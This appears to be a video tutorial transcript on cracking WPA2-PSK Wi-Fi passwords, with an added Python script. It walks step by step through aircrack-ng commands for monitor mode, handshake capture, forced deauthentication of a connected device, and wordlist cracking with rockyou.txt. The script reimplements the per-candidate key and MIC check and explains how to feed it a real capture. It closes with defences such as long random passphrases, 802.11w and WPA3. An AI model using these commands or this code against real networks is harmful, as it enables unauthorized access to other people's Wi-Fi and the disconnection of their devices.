No matter where you go, if you switch on Wi-Fi you're going to find a ton of networks that probably use WPA-PSK encryption. Since you clicked on this video, you probably know that these kinds of networks are easily hackable, but do remember that this is entirely for educational purposes and you should never do this on a stranger's network, as it is illegal. With that out of the way, I'm going to explain why and how it works, how to actually do it, and how to protect yourself against it.

So every time you connect to a network from a wireless device, a handshake is exchanged between the device and the router. This handshake does not actually carry an encrypted copy of the password; what it carries are values computed from it. The router and the device each send a random nonce, and the device proves it knows the password by sending a message integrity code (MIC) calculated with a key that is derived from the password and the network name. You can't reverse that MIC to get the password back, but what you can do is use something called a wordlist attack. A wordlist is a huge text file containing millions of passwords, and if you run every one of them through the same derivation the real password went through, you can compare each result against the MIC in the captured handshake.
Whenever one matches, you know what the real password is. So now that you know how it works, how do you actually do it? The first thing you're going to need is a computer running Linux. The operating system I'll be using is Kali Linux, since it comes with all the tools I need pre-installed; if you want to run it on another Linux distribution, all you need to do is install the packages shown here, which are all part of the aircrack-ng suite. Another thing you might need, if your computer's network card doesn't support monitor mode, is an external network card like this cheap TP-Link adapter; you'll know whether you need it at the next step.

Now I need to know which network I want to attack, which in my case is the angelus network, but simply having the name is not enough. To figure out more information about the target, first we need to find out the name of your wireless interface. To do this, open up a terminal and run ip a. Here are all of your network interfaces; the wireless ones will start with wlan, for example mine is wlan0, which stands for wireless local area network zero. What I want to do now is turn on monitor mode for this network card so that I can start receiving all of the traffic that's around me. To do this I'm going to use a tool called airmon-ng; the specific command is airmon-ng start followed by the wireless network interface, which in my case is wlan0, so if you happen to have wlan1 then you would use wlan1. This command switches the mode of your network card from managed to monitor, which also means that your internet will break, so you won't be able to look anything up online.

Now if you run iwconfig in any terminal, you'll be able to see that the network card's mode has been changed to monitor. If that isn't the case, it means that your network card doesn't support monitor mode and you're going to need the adapter I showed
earlier, or some other option. Also note that turning on monitor mode changes the name of your wireless interface: a quick ip a shows that mine changed from wlan0 to wlan0mon. Now that monitor mode is on, I need to start listening to the networks around me with the command airodump-ng followed by the interface that has monitor mode turned on, so in my case wlan0mon. Here you can see all the networks nearby, and you can see that my network is listed too. What you need to note from here is the channel of your network and its BSSID, which is the router's MAC address and in my case is this one. To leave this screen, press Ctrl+C.

With the BSSID and the channel of my network saved, I can run airodump-ng -d followed by the BSSID, -c followed by the channel number, -w followed by the name of the capture file that will be written (airodump-ng appends -01.cap to it), which will contain the handshake we need to crack the password, and finally the network interface, wlan0mon. Running this command shows you the devices currently connected to that network, and you can see that if I open a video on YouTube, the number of packets being sent to one of the devices goes up a lot, so that one would be the iPad, for instance. As I explained earlier, I need to capture the handshake at the moment the device connects to the network, but this device is already connected, so what I'm going to do is a deauthentication attack to force it to reconnect so that I can capture the handshake. I need to keep this window with airodump-ng open and open a second terminal to run more commands; I personally use Terminator, which lets me split a single terminal into multiple windows, 10 out of 10 would recommend.

To deauthenticate I can use the aireplay-ng tool. The parameters here are: aireplay-ng followed by -0, which means deauthentication, then 10 for the number of deauth packets we'll send, -a followed by the BSSID of the router, -c followed by the victim's MAC address (the station address airodump-ng showed for the iPad), and finally the network interface. So here we are sending a total of 10 deauth packets to the iPad, and when you press Enter you can see the iPad gets forcibly disconnected, reconnects, and the handshake is captured; airodump-ng shows WPA handshake followed by the BSSID in its top line once it has one. Keep in mind that handshakes sometimes aren't captured the first time, so you may have to do this two or more times. Now that the handshake is captured I can stop airodump-ng with Ctrl+C, and you can see that a file has been saved in the current directory with the name I gave it earlier. Kali Linux has a few wordlists already pre-installed in this directory; the one I'll use is rockyou.txt, which is the largest of them and contains millions of passwords from a real breach. The command used to crack is aircrack-ng -w followed by the location of the wordlist, which is here, followed by the name
of the capture file. After letting that run for a while you can see that a match was found, and this is the password for my network.

Your internet connection will still be broken after this. To fix it you can either restart your computer or run airmon-ng stop followed by the monitor interface, which in my case is wlan0mon, but it will still be broken after that, so you then need to restart the network services with systemctl restart net followed by an asterisk, which restarts every unit whose name begins with net, like network-something (on Kali the service in question is NetworkManager, so systemctl restart NetworkManager does the same thing explicitly).

So now that we've gone through how it works and how to do it, how do you actually protect yourself against this? Unfortunately there's nothing you can do against the deauthentication on a plain WPA2 network; only protected management frames (802.11w, which WPA3 makes mandatory) stop the client and the router from accepting forged deauth frames. To defeat the wordlist attack itself you just need to pick a very long random password that is unlikely to be found in any wordlist; since the network name is used as the salt when the password is turned into a key, a unique SSID also stops an attacker from reusing precomputed tables, and moving to WPA3 removes the offline guessing attack entirely. And that's pretty much it for this video; if you enjoyed it, feel free to leave a like, and thank you for watching.
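The check that aircrack-ng repeats for every line of rockyou.txt, and the reason the explanation at the start talks about a derived key rather than an encrypted password, as an added example that is not code from the video or from the aircrack-ng project. The handshake it runs against is constructed inside the file: the SSID HomeNet-2G, both MAC addresses, both nonces, the message-2 EAPOL-Key frame and the password password123 are all made up for the example, as is the short stand-in wordlist; the function names are mine. A real run would take those values from the .cap file airodump-ng wrote.

```python
"""
WPA2-PSK wordlist check: the work aircrack-ng does for every wordlist entry.

Added example, not code from the video or from the aircrack-ng project.
Everything marked "constructed" is made up for this file; a real attack would
take the SSID, both MAC addresses, both nonces, the message-2 EAPOL-Key frame
and its MIC from the airodump-ng capture.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1 over the passphrase, salted with
    the SSID, 4096 iterations, 32 bytes. The SSID salt is why the same
    passphrase gives a different PMK on every differently named network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-384: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    for i = 0, 1, 2 and keep the first 48 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3)
    )
    return out[:48]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the PMK and the four values that travel in
    the clear during the 4-way handshake. The KCK is the first 16 bytes."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_384(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC of an EAPOL-Key frame for WPA2/CCMP: HMAC-SHA1 under the KCK over
    the whole frame with its 16-byte MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def candidate_matches(hs: dict, passphrase: str) -> bool:
    """One wordlist entry: derive PMK -> PTK -> KCK, recompute the MIC and
    compare it with the MIC the client actually sent in message 2."""
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    kck = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"],
                     hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol_mic_zeroed"]), hs["mic"])


def wordlist_attack(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Try every candidate in order. WPA passphrases are 8 to 63 characters,
    so shorter or longer wordlist lines are skipped, as aircrack-ng does."""
    for line in wordlist:
        candidate = line.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:
            continue
        if candidate_matches(hs, candidate):
            return candidate
    return None


def constructed_handshake(real_passphrase: str, ssid: str = "HomeNet-2G") -> dict:
    """Build message 2 of a handshake the way a client would, so the attack
    above has something to run against. All values are constructed here."""
    ap_mac = bytes.fromhex("020000000001")       # constructed, locally administered
    client_mac = bytes.fromhex("020000000002")   # constructed, locally administered
    anonce = hashlib.sha256(b"constructed anonce").digest()  # 32-byte nonces
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # EAPOL v2, type Key, 95-byte body: RSN descriptor (0x02); key info 0x010a
    # (MIC bit set, pairwise, descriptor version 2 = HMAC-SHA1 MIC); key length 0;
    # replay counter 1; SNonce; zero IV, RSC, key ID; zeroed MIC; no key data.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    kck = derive_ptk(pmk_from_passphrase(real_passphrase, ssid),
                     ap_mac, client_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce,
            "eapol_mic_zeroed": eapol, "mic": eapol_mic(kck, eapol)}


# Constructed stand-in for rockyou.txt; the first two lines are too short for WPA.
SAMPLE_WORDLIST = ["letmein", "123456", "Summer2019!", "password123",
                   "correct horse battery staple"]

if __name__ == "__main__":
    handshake = constructed_handshake("password123")
    print("recovered:", wordlist_attack(handshake, SAMPLE_WORDLIST))
```

To run it against a real capture, replace constructed_handshake with the values pulled from the .cap file (the two MACs, the nonces from messages 1 and 2, and the message-2 frame with its MIC field zeroed) and pass an open file such as open("/usr/share/wordlists/rockyou.txt", errors="ignore") as the wordlist. The per-candidate cost is dominated by the 4096 PBKDF2 rounds, which is what bounds aircrack-ng's guessing speed on a CPU and why a long random passphrase, or one not in any wordlist, is enough to make the attack impractical.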